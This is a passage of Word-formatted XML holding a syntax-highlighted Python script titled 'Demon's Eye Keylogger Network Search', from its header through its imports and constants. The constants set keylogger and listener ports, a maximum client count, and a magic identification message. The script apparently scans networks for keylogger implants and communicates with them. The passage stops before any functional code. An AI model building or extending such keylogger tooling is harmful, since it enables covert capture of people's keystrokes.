      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">18   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># First Release:    04/09/2019</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">19   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># Version:          0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">20   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># -----------------------------------------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">21   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">22   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">23   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>argparse</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">24   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>base64</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">25   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>ipaddress</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">26   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>msvcrt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">27   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>socket</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">28   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>sys</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">29   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>threading</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">30   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>time</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">31   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>urllib</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>request</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">32   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">33   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t>########################################################</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">34   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># CONSTANTS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">35   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t>########################################################</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">36   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">APPNAME </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t>'Demon</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s51"/>
        </w:rPr>
        <w:t>\'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t xml:space="preserve">s Eye Keylogger Network Search'                   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># Just a name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">37   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">VERSION </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t xml:space="preserve">'v0.0.1'                                                  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># Version</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">38   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">KEYLOGGER_PORT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s61"/>
        </w:rPr>
        <w:t xml:space="preserve">6666                                               </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># Port of keylogger</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">39   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">DEFAULT_SERVER_PORT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s61"/>
        </w:rPr>
        <w:t xml:space="preserve">7777                                          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># Port to receive response after connect</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">40   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">SERVER_ACCEPT_TIMEOUT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s61"/>
        </w:rPr>
        <w:t>0.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">41   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">HOST_BIND </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t xml:space="preserve">''                                                      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># Bind address to listen server (any)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">42   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">MAX_CLIENTS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s61"/>
        </w:rPr>
        <w:t xml:space="preserve">10                                                    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># Number of keyloggers to listen</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">43   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">PORT_LIST_SCAN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>KEYLOGGER_PORT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t xml:space="preserve">]                                   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># List of ports to Scan. For testing multiple ports</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">44   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">MAGIC_MESSAGE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t xml:space="preserve">'4ScauMiJcywpjAO/OfC2xLGsha45KoX5AhKR7O6T+Iw='      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># Message to indentify to keylogger</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">45   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">BUFFER_SIZE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s61"/>
        </w:rPr>
        <w:t xml:space="preserve">4096                                                  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># Buffer size</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">46   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">DEFAULT_TIMEOUT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s61"/>
        </w:rPr>
        <w:t xml:space="preserve">2                                                 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># Default Timeout (seconds)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">47   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">DEFAULT_NO_WAIT_RESPONSE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= False                                    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># No Wait response after sending message</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">48   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">ENCODING </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t xml:space="preserve">'utf-8'                                                  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># Encoding for message sended</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">49   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">VERBOSE_LEVELS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t>'low'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t>'a bit'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t>'insane debug'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t xml:space="preserve">]                   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># Verbose levels</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">50   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">DEMONS_EYE_ID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t xml:space="preserve">'D3Y3K3YL0G'                                        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># Keylogger ID in response</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">51   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">52   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">53   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t>########################################################</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">54   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># VARIABLES</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">55   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t>########################################################</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">56   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">threadList </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t xml:space="preserve">[]                                         </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># List of active threads</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">57   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">verbose </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s61"/>
        </w:rPr>
        <w:t xml:space="preserve">0                                             </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># Verbosity disabled, enabled</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">58   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">net_range </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
